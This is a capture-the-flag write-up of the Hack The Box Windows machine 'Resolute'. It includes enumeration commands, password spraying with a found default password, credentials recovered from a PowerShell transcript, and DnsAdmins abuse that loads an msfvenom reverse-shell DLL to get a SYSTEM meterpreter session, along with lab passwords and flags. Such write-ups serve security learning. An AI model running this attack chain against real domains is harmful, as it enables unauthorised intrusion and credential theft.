Resolute is a medium difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM.
I got a username list from rpcclient and filtered them.
SMB Enumeration
I didn't get anything as anonymous login failed
I also try password spraying with the same usernames as passwords but failed
KERBEROS Enumeration
I tried ASREP-Roasting attack but no thing
Initial Access
When I run out all the options I know to get a foothold, I decided to query the users info I got from rpccclient, maybe a password exists in description field or something
we found the password Welcome123!, Let's confirm access with user marko
It seems like this password doesn't belong to him, So I will spray it to the list of users we have
So, we have now valid credentials melanie:Welcome123!, Let's see if we have remote access to that box
Yes, we have :)
User Flag: f65ae23b0313053bb9xxxxxxxxxxxxxxxx
Privilege Escalation
When I landed on windows box joined to Active Directory, I run bloodhound.py to collect info about the domain and provide it to bloodhound GUI
Start neo4j database and then run bloodhound to open GUI
provide the data collected as zip file to bloodhound
user ryan has a profile on the box, Let's enumerate him in bloodhound
Click on unrolled group membership to see nested group membership
ryan is a member of DNSADMINS group via nested group membership, So If I could takeover this account, the path to Domain Admins is clear
I found no database, PowerShell history file, no stored credentials or scripts located somewhere however, I learned a trick before that I always make on windows machine which is looking for hidden files as I do in Linux
PSTranscripts is not a standard directory, Let's explore it
That .txt file looks very interesting, Let's see
Let's check if these credential are valid
And successfully got the ryan account.
we can then abuse our membership in DNS Admins group, we can alter the .dll of dns service running as SYSTEM to add ourselves in Domain Admins group or get a reverse shell as SYSTEM
Before we start the attack, Let's first confirm we have control on dns service
The object SID that has control of dns service is S-1-5-21-1392959593-3013219662-3596683436-1105 I look at bloodhound to get the SID of user ryan and see if the two SIDs match each other
So, we have control of DNS service, Let's start the attack.
Generate malicious dll to add ryan to domain admins
upload the malicious dll to the box via winrm
Load our dll
Start meterpreter listener
Stop and start dns service to get the dll executed
My exploit failed for some reason but after few moments, I realized that there was a script that revert everything and delete my payload, So I created a one-linear command to get my payload executed before it was deleted
Root Flag: 2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
Reverst.ps1
This the script which was preventing us as it does the following:
Reset ryan, melanie and administrator password
Reset dns settings
We can see the plaintext password of administrator
Access the machine as admin with plaintext password.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
<snip>
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ for rid in $(cat rid.lst); do rpcclient -U "%" $ip -c "queryuser $rid" | tee -a rpc.output;done
<snip>
User Name : marko
Full Name : Marko Novak
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Account created. Password set to Welcome123!
Workstations:
Comment :
Remote Dial :
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound-python -u 'melanie' -p 'Welcome123!' -ns $ip -d megabank.local -c all
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 28 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 20S
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
*Evil-WinRM* PS C:\> ls -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 7/10/2024 7:18 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\> type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
<snip>
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
<snip>
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe sdshow DNS
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=8443 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
[*] Sending stage (201798 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.16.3:8443 -> 10.10.10.169:53631) at 2024-07-10 23:40:39 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2592 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator
C:\Users\Administrator>type Desktop\root.txt
2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
